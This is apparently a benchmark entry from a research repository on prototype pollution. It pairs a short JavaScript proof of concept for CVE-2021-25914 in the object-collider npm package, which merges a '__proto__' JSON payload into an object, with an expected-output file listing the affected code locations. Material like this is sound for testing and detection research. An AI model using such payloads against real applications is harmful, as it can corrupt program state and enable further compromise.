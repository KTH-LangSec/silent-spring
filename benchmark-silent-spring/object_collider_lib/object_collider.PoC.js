//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25914
var { collide } = require("object-collider") 

obj = {}
const payload = JSON.parse('{"__proto__":{"polluted":"yes"}}'); 
collide(obj, payload);
  