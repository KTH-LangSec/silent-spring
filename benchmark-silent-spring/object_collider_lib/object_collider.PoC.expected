node_modules/object-collider/dist/src/utils/CollideUtil.js:79:17:79:20
node_modules/object-collider/dist/src/utils/CollideUtil.js:72:13:72:16
